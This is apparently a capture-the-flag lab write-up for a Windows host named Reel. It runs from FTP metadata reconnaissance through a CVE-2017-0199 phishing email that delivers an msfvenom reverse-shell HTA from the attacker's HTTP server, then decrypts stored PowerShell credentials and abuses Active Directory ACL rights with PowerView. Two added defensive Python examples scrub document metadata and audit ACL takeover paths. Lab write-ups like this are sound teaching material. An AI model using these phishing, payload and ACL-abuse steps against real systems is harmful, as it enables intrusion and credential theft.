Nmap scan of the target

nmap -A -T4 10.10.10.77
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-18 01:30 EST
Nmap scan report for 10.10.10.77
Host is up (0.55s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18  11:19PM       <DIR>          documents
| ftp-syst:
|_  SYST: Windows_NT
22/tcp open  ssh     OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
|   2048 8220c3bd16cba29c88871d6c1559eded (RSA)
|   256 232bb80a8c1cf44d8d7e5e6458803345 (ECDSA)
|_  256 ac8bde251db7d838389b9c16bff63fed (ED25519)
25/tcp open  smtp?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
|     220 Mail Service ready
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|   Hello:
|     220 Mail Service ready
|     EHLO Invalid domain address.
|   Help:
|     220 Mail Service ready
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   SIPOptions:
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|   TerminalServerCookie:
|     220 Mail Service ready
|_    sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (86%), Microsoft Windows 8.1 Update 1 (85%), Microsoft Windows Phone 7.5 or 8.0 (85%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 25/tcp)
HOP RTT       ADDRESS
1   636.94 ms 10.10.16.1
2   637.07 ms 10.10.10.77

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.69 seconds

The scan shows a Windows Server 2012 host with the FTP, SSH and SMTP services exposed.

Trying to log in over FTP and SSH

Anonymous FTP login is allowed:

ftp 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:kali): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||41001|)
125 Data connection already open; Transfer starting.
05-28-18  11:19PM       <DIR>          documents
226 Transfer complete.
ftp>

Information gathering

The following files were found and downloaded:

ftp> dir
229 Entering Extended Passive Mode (|||41007|)
125 Data connection already open; Transfer starting.
05-28-18  11:19PM                 2047 AppLocker.docx
05-28-18  01:01PM                  124 readme.txt
10-31-17  09:13PM                14581 Windows Event Forwarding.docx
226 Transfer complete.
ftp> get readme.txt
local: readme.txt remote: readme.txt
229 Entering Extended Passive Mode (|||41008|)
150 Opening ASCII mode data connection.
100% |*******************************|   124        0.19 KiB/s    00:00 ETA
226 Transfer complete.
124 bytes received in 00:00 (0.13 KiB/s)
ftp> get Windows\ Event\ Forwarding.docx
local: Windows Event Forwarding.docx remote: Windows Event Forwarding.docx
229 Entering Extended Passive Mode (|||41010|)
150 Opening ASCII mode data connection.
100% |*******************************| 14581       14.21 KiB/s    00:00 ETA
ftp: Reading from network: Interrupted system call
0% |                               |    -1        0.00 KiB/s    --:-- ETA
226 Transfer complete.
WARNING! 51 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
ftp> dir
229 Entering Extended Passive Mode (|||41011|)
125 Data connection already open; Transfer starting.
05-28-18  11:19PM                 2047 AppLocker.docx
05-28-18  01:01PM                  124 readme.txt
10-31-17  09:13PM                14581 Windows Event Forwarding.docx
226 Transfer complete.
ftp> get AppLocker.docx
local: AppLocker.docx remote: AppLocker.docx
229 Entering Extended Passive Mode (|||41012|)
150 Opening ASCII mode data connection.
100% |*******************************|  2047        2.27 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 9 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
2047 bytes received in 00:01 (1.70 KiB/s)
ftp> exit
221 Goodbye.
Use exiftool to inspect the metadata of "Windows Event Forwarding.docx".
Command: exiftool "Windows Event Forwarding.docx"
Output:

ExifTool Version Number         : 12.49
File Name                       : Windows Event Forwarding.docx
Directory                       : .
File Size                       : 15 kB
File Modification Date/Time     : 2023:01:18 01:58:38-05:00
File Access Date/Time           : 2023:01:18 01:59:18-05:00
File Inode Change Date/Time     : 2023:01:18 01:58:38-05:00
File Permissions                : -rw-r--r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x82872409
Zip Compressed Size             : 385
Zip Uncompressed Size           : 1422
Zip File Name                   : [Content_Types].xml
Creator                         : nico@megabank.com
Revision Number                 : 4
Create Date                     : 2017:10:31 18:42:00Z
Modify Date                     : 2017:10:31 18:51:00Z
Template                        : Normal.dotm
Total Edit Time                 : 5 minutes
Pages                           : 2
Words                           : 299
Characters                      : 1709
Application                     : Microsoft Office Word
Doc Security                    : None
Lines                           : 14
Paragraphs                      : 4
Scale Crop                      : No
Heading Pairs                   : Title, 1
Titles Of Parts                 :
Company                         :
Links Up To Date                : No
Characters With Spaces          : 2004
Shared Doc                      : No
Hyperlinks Changed              : No
App Version                     : 14.0000

The Creator field reveals the mailbox nico@megabank.com.
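The Creator field exiftool reports is stored in docProps/core.xml inside the .docx zip. The following is an added example (not from the write-up) of listing and blanking those fields before a document is placed on a share; the core.xml and the minimal docx are constructed inline using the page's creator value, and a damaged archive (as after an ASCII-mode FTP transfer) surfaces as zipfile.BadZipFile.

```python
# Added example (not from the write-up): the Creator value exiftool showed lives in
# docProps/core.xml inside the .docx zip. A defender can list and blank such fields
# before publishing. The core.xml below is constructed inline (real OOXML namespaces).
import io
import re
import zipfile

IDENTIFYING_TAGS = ("dc:creator", "cp:lastModifiedBy")  # people-identifying properties

CORE_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" '
    'xmlns:dc="http://purl.org/dc/elements/1.1/">'
    '<dc:creator>nico@megabank.com</dc:creator><cp:lastModifiedBy>nico</cp:lastModifiedBy>'
    '<cp:revision>4</cp:revision></cp:coreProperties>'
)


def build_sample_docx() -> bytes:
    """Return a constructed minimal .docx (a zip holding the parts we need)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("docProps/core.xml", CORE_XML)
    return buf.getvalue()


def author_metadata(docx: bytes) -> dict:
    """Return {tag: value} for non-empty identifying core properties.
    Raises zipfile.BadZipFile on a damaged archive (e.g. an ASCII-mode FTP transfer)."""
    with zipfile.ZipFile(io.BytesIO(docx)) as zf:
        core = zf.read("docProps/core.xml").decode("utf-8")
    found = {}
    for tag in IDENTIFYING_TAGS:
        m = re.search(rf"<{tag}>([^<]*)</{tag}>", core)  # paired tags only
        if m and m.group(1):
            found[tag] = m.group(1)
    return found


def scrub_metadata(docx: bytes) -> bytes:
    """Rewrite the archive with the identifying core properties emptied."""
    src = zipfile.ZipFile(io.BytesIO(docx))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            data = src.read(item.filename)
            if item.filename == "docProps/core.xml":
                text = data.decode("utf-8")
                for tag in IDENTIFYING_TAGS:
                    text = re.sub(rf"<{tag}>[^<]*</{tag}>", f"<{tag}></{tag}>", text)
                data = text.encode("utf-8")
            dst.writestr(item.filename, data)
    return out.getvalue()
```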

Attempting to obtain a shell by phishing the mailbox

CVE used: CVE-2017-0199
Download: https://github.com/bhdresh/CVE-2017-0199
Brief description: CVE-2017-0199 is a logic vulnerability in the way Microsoft Office implements OLE handling. Its root cause is that when Word processes an embedded OLE2Link object and updates that object over the network, it does not handle the Content-Type correctly. Because it is a logic flaw, exploiting it does not require bypassing Microsoft's mitigations such as ASLR and DEP, so the success rate is very high.

Generate the HTA shell payload with msfvenom, command: msfvenom -p windows/shell_reverse_tcp lhost=10.10.16.13 lport=6666 -f hta-psh -o shell.hta
Start a Python HTTP server so the payload can be fetched remotely, command: python3 -m http.server 80
Generate the RTF carrier document, command: python2 cve-2017-0199_toolkit.py -M gen -w hi.rtf -u http://10.10.16.13/shell.hta -t rtf -x 0
Start nc to receive the reverse shell.
Command: nc -nvlp 6666
Send the payload file to the target mailbox with sendEmail.
Command: sendEmail -f mac@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a hi.rtf -s 10.10.10.77 -v
Output:

Jan 18 03:59:55 kali sendEmail[40007]: DEBUG => Connecting to 10.10.10.77:25
Jan 18 03:59:55 kali sendEmail[40007]: DEBUG => My IP address is: 10.10.16.13
Jan 18 03:59:55 kali sendEmail[40007]: SUCCESS => Received:     220 Mail Service ready
Jan 18 03:59:55 kali sendEmail[40007]: INFO => Sending:         EHLO kali
Jan 18 03:59:56 kali sendEmail[40007]: SUCCESS => Received:     250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP
Jan 18 03:59:56 kali sendEmail[40007]: INFO => Sending:         MAIL FROM:<mac@megabank.com>
Jan 18 03:59:56 kali sendEmail[40007]: SUCCESS => Received:     250 OK
Jan 18 03:59:56 kali sendEmail[40007]: INFO => Sending:         RCPT TO:<nico@megabank.com>
Jan 18 03:59:57 kali sendEmail[40007]: SUCCESS => Received:     250 OK
Jan 18 03:59:57 kali sendEmail[40007]: INFO => Sending:         DATA
Jan 18 03:59:57 kali sendEmail[40007]: SUCCESS => Received:     354 OK, send.
Jan 18 03:59:57 kali sendEmail[40007]: INFO => Sending message body
Jan 18 03:59:57 kali sendEmail[40007]: Setting content-type: text/plain
Jan 18 03:59:57 kali sendEmail[40007]: DEBUG => Sending the attachment [hi.rtf]
Jan 18 04:00:09 kali sendEmail[40007]: SUCCESS => Received:     250 Queued (12.156 seconds)
Jan 18 04:00:09 kali sendEmail[40007]: Email was sent successfully!  From: <mac@megabank.com> To: <nico@megabank.com> Subject: [Invoice Attached] Attachment(s): [hi.rtf] Server: [10.10.10.77:25]

After a short while the Python HTTP server is accessed and nc receives the shell.
The HTTP server log:

python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.77 - - [18/Jan/2023 04:00:25] "GET /shell.hta HTTP/1.1" 200 -
10.10.10.77 - - [18/Jan/2023 04:00:26] "GET /shell.hta HTTP/1.1" 200 -

nc receives the shell:

nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.16.13] from (UNKNOWN) [10.10.10.77] 60488
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Get the user flag:
C:\Users\nico\Desktop>type user.txt

Using msf instead of nc to obtain the shell:

msfconsole
msf > use exploit/windows/fileformat/office_word_hta
msf > set lhost 10.10.14.17
msf > set lport 4444
msf > set srvhost 10.10.14.17
msf > run
sendEmail -f mac@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a /root/.msf4/local/msf.doc -s 10.10.10.77 -v

Obtaining the Tom account

A sensitive file, cred.xml, sits on the current user's desktop. It is the XML document that Export-CliXml writes for a PSCredential object; PSCredential objects are what PowerShell uses to hold a username, password and credentials. Export-CliXml protects the password with DPAPI under the exporting user's key, so the file decrypts only for that same user on that same machine, which is why it can be read back from nico's session.
Extract the password with PowerShell, command: powershell -c "$cred = Import-CliXml -Path c:\Users\nico\Desktop\cred.xml;$cred.GetNetworkCredential() | Format-List *"
Output:

UserName       : Tom
Password       : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain         : HTB

Account obtained: htb\Tom:1ts-mag1c!!!

Starting an anonymous SMB share for file transfer

Command to start the anonymous SMB share: python3 smbserver.py share /home/kali/Desktop/temp/
Log in to the target over SSH as htb\Tom:1ts-mag1c!!! and gather information. The following key material turns up:

C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors
05/29/2018  07:57 PM    <DIR>          .
05/29/2018  07:57 PM    <DIR>          ..
11/16/2017  11:50 PM           112,225 acls.csv
10/28/2017  08:50 PM             3,549 BloodHound.bin
10/24/2017  03:27 PM           246,489 BloodHound_Old.ps1
10/24/2017  03:27 PM           568,832 SharpHound.exe
10/24/2017  03:27 PM           636,959 SharpHound.ps1
               5 File(s)      1,568,054 bytes
               2 Dir(s)   4,937,048,064 bytes free

Copy acls.csv back to the attacking machine, command: copy acls.csv \\10.10.16.13\share\

Manual analysis of acls.csv

The following key rows were found:
claire@HTB.LOCAL   USER        tom@HTB.LOCAL  USER    WriteOwner      AccessAllowed   FALSE
Backup_Admins@HTB.LOCAL    GROUP       claire@HTB.LOCAL   USER    WriteDacl       AccessAllowed   FALSE
tom@HTB.LOCAL has WriteOwner over the claire@HTB.LOCAL account, and claire@HTB.LOCAL has WriteDacl over Backup_Admins@HTB.LOCAL.
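Chains like the one above are what an ACL audit of a BloodHound export should surface before an attacker does. The following is an added example (not from the write-up) that parses rows in the layout shown, keeps only allow ACEs whose right lets the principal take over the object, and searches for a takeover path between two principals; the sample rows are constructed (two extra rows exercise the AccessDenied and non-dangerous-right filters), and the DANGEROUS_RIGHTS set is an assumption based on common ACL abuse primitives, not taken from the page.

```python
# Added example (not from the write-up): an offline audit of BloodHound-style ACL
# rows in the layout shown above (object, object type, principal, principal type,
# right, ACE type, inherited). It keeps allow ACEs whose right lets the principal
# take over the object and walks them for a takeover path. Rows are constructed;
# DANGEROUS_RIGHTS is an assumption (common ACL abuse primitives), not from the page.
from collections import deque

DANGEROUS_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl",
                    "ForceChangePassword", "AllExtendedRights", "Owns"}

SAMPLE_ACLS = """\
claire@HTB.LOCAL USER tom@HTB.LOCAL USER WriteOwner AccessAllowed FALSE
Backup_Admins@HTB.LOCAL GROUP claire@HTB.LOCAL USER WriteDacl AccessAllowed FALSE
Backup_Admins@HTB.LOCAL GROUP tom@HTB.LOCAL USER GenericAll AccessDenied FALSE
tom@HTB.LOCAL USER claire@HTB.LOCAL USER ReadProperty AccessAllowed TRUE
"""


def parse_acls(text: str) -> list[dict]:
    """Parse whitespace-separated rows; rows without exactly seven fields are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue
        obj, _obj_type, principal, _p_type, right, ace_type, inherited = parts
        rows.append({"object": obj, "principal": principal, "right": right,
                     "ace_type": ace_type, "inherited": inherited.upper() == "TRUE"})
    return rows


def dangerous_edges(rows: list[dict]) -> dict[str, set[str]]:
    """Map principal -> objects it can take over (allow ACE with a dangerous right)."""
    edges: dict[str, set[str]] = {}
    for r in rows:
        if r["ace_type"] == "AccessAllowed" and r["right"] in DANGEROUS_RIGHTS:
            edges.setdefault(r["principal"], set()).add(r["object"])
    return edges


def takeover_path(rows: list[dict], start: str, target: str) -> list[str]:
    """Shortest chain of takeovers from start to target via BFS, or [] if none."""
    edges = dangerous_edges(rows)
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        if path[-1] == target:
            return path
        for nxt in sorted(edges.get(path[-1], ())):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return []
```

Run against a full acls.csv, every non-empty path into a privileged group is an ACE to remove or justify.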

Privilege escalation

Abusing the ACL rights with PowerView to escalate privileges
Download: https://github.com/PowerShellMafia/PowerSploit
Directory: PowerSploit-master\PowerSploit-master\Recon
Procedure:

. .\PowerView.ps1    // import PowerView

Make the current user tom the owner of claire's ACL and grant tom the right to reset her password:
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword -Verbose

Set claire's password to Ab345678123!@#:
$cred = ConvertTo-SecureString "Ab345678123!@#" -AsPlainText -force
Set-DomainUserPassword -identity claire -accountpassword $cred

Log in over SSH:
ssh claire@10.129.5.10

Inspect the backup_admins group; only the ranj user is a member:
net group backup_admins

Add claire to the backup_admins group, then log in again:
net group backup_admins claire /add
net group backup_admins

Searching the Backup Scripts directory for passwords turned up the administrator password Cr4ckMeIfYouC4n!, which gives SYSTEM privileges.

Summary

Nmap showed a Windows Server 2012 host with FTP, SSH and SMTP exposed, and anonymous FTP login was allowed.
A docx file was found there; viewing the metadata of "Windows Event Forwarding.docx" with exiftool revealed a mailbox, which was phished with CVE-2017-0199
to obtain an nc reverse shell. Analysing the BloodHound data showed that tom@HTB.LOCAL has WriteOwner over the claire@HTB.LOCAL
account and that claire@HTB.LOCAL has WriteDacl over Backup_Admins@HTB.LOCAL;
abusing these rights with PowerView escalated privileges, after which searching the Backup Scripts directory for passwords
turned up the administrator password Cr4ckMeIfYouC4n!, giving SYSTEM privileges.
